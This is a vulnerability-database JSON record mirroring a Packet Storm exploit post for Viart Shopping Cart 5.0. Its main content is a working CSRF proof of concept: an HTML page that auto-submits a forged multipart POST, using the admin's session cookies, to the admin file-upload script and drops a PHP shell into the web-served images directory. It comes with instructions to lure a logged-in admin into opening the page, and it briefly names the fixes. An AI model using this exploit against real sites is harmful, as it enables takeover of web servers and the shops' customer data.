{"id": "PACKETSTORM:137455", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Viart Shopping Cart 5.0 CSRF / Shell Upload", "description": "", "published": "2016-06-13T00:00:00", "modified": "2016-06-13T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/137455/Viart-Shopping-Cart-5.0-CSRF-Shell-Upload.html", "reporter": "Ali Ghanbari", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:01", "viewCount": 15, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/137455/viartshoppingcart-xsrfshell.txt", "sourceData": "`<!-- \n# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability \n# Date : 2016/06/12 \n# Google Dork : Script-Kiddie ;) \n# Exploit Author : Ali Ghanbari \n# Vendor Homepage : http://www.viart.com/ \n# Software Link : http://www.viart.com/php_shopping_cart_free_evaluation_download.html \n# Version : 5.0 \n \n \n#POC \n--> \n \n<html> \n<body onload=\"submitRequest();\"> \n<script> \nfunction submitRequest() \n{ \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", \"http://localhost/admin/admin_fm_upload_files.php\", true); \nxhr.setRequestHeader(\"Accept\", \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"); \nxhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\"); \nxhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------256672629917035\"); \nxhr.withCredentials = \"true\"; \nvar body = \"-----------------------------256672629917035\\r\\n\" + \n\"Content-Disposition: form-data; name=\\\"dir_root\\\"\\r\\n\" + \n\"\\r\\n\" + \n\"../images\\r\\n\" + \n\"-----------------------------256672629917035\\r\\n\" + \n\"Content-Disposition: form-data; name=\\\"newfile_0\\\"; filename=\\\"[shell.php]\\\"\\r\\n\" + \n\"Content-Type: 
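application/x-php\\r\\n\" + \n\"\\r\\n\" + \n\"\\r\\n\" + \n\"-----------------------------256672629917035--\\r\\n\"; \nvar aBody = new Uint8Array(body.length); \nfor (var i = 0; i < aBody.length; i++) \naBody[i] = body.charCodeAt(i); \nxhr.send(new Blob([aBody])); \n} \n</script> \n</body> \n</html> \n \n<!-- \n#Desc: \n \nHost the exploit page on your own server and send the link to the admin. When the logged-in admin clicks the link, \nthe uploaded shell can be reached at the path below : \n \nhttp://localhost/images/[your shell] \n \nThis works because the forged POST carries the admin's session cookies (withCredentials) and no anti-CSRF token, \nand the uploaded .php file lands in the web-served images directory. The corresponding fixes are a CSRF token \ncheck on admin_fm_upload_files.php and refusing, or never executing, script files uploaded there. \n \n#################################### \n \n[+]Exploit by: Ali Ghanbari \n \n[+]My Telegram :@Exploiter007 \n--> \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645369007, "score": 1659770509}}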
{}